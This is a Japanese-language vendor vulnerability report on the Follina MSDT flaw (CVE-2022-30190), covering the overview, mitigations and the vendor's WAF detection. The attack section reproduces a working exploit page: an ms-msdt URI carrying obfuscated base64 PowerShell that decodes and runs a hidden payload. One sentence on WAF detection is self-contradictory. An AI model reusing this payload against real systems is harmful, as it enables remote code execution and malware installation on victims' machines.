TAチームが 「MS Officeのゼロデイ脆弱性Follina(CVE-2022-30190) 」を解析して書いた脆弱性レポート。

CVE-2022-30190 は、Microsoft Support Diagnostic Tool (MSDT) に存在するリモートコード実行 (RCE) の脆弱性で、悪意のある Word 文書を経由して、攻撃者が被害者のシステム上で任意のコマンドを実行する可能性があります。

この脆弱性を防ぐには、最新のセキュリティパッチを適用し、MSDTプロトコルを無効にすることが重要です。ユーザーは、未知のソースからの文書を開かないように注意すべきである。

1. 概要

本脆弱性は、Microsoft Windows における MS Office 文書の処理機能に関するセキュリティ上の欠陥である。この脆弱性により、特に Word 文書を介して悪意のあるコードが実行され、攻撃者が被害者の介入なしにリモートでコードを実行できる可能性があります。CVE-2022-30190 は、Windows の Microsoft Support Diagnostic Tool (MSDT) に発生し、この脆弱性を悪用されると、攻撃者がリモートでコードを実行 (RCE) する可能性があります。

ソース : https://www.vicarius.io/vsociety/posts/microsoft-support-diagnostic-tool-remote-code-execution-vulnerability-cve-2022-30190

2. 攻撃タイプ

脆弱性が確認されたWord文書では、既知の手法であるExternalタグ内のURL接続により、脆弱なHTMLファイルをダウンロードし、実行することで脆弱性が発生した。

<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-- raw --

//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../..//Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

上記のコードが記載されたワード文書がメールで被害者に転送され、さらにその文書を開いたりプレビューしたりすると、MSDTはリモートサーバー上の悪意のあるスクリプトをダウンロードして実行します。これは、攻撃者が被害者のコンピュータ上で任意のコマンドを実行することを可能にする攻撃です。

ソース : https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr

3. 対応

Follina 脆弱性に対する普遍的な対応は以下の通りである。

1. セキュリティパッチの適用：マイクロソフトが提供するセキュリティ更新プログラムを直ちにインストールする。
2. MSDTを無効にする：レジストリエディタを使ってms-msdtプロトコルを無効にする。
3. 文書ファイルに注意する： 特にWord文書のプレビュー機能を使用しないよう注意する。

当社のAIWAF製品は、316でms-msdtのようなプロトコルを検出します： Command Injection (ms-msdt)」パターンで検出されますが、これは正常なものとして検出されます。

4. 結論

CVE-2022-30190 は、MS Office ユーザーにとって重大な脅威となり得る脆弱性である。この脆弱性を放置すると、攻撃者が遠隔操作で悪意のあるコードを実行し、被害者のシステムを乗っ取ることが可能になります。そのため、最新のセキュリティ更新プログラムの適用、MSDTプロトコルの無効化、その他のセキュリティ対策が重要です。

5. 参考文献

• https://www.vicarius.io/vsociety/posts/microsoft-support-diagnostic-tool-remote-code-execution-vulnerability-cve-2022-30190
• https://asec.ahnlab.com/ko/34919/
• https://blog.naver.com/best_somansa/222839504756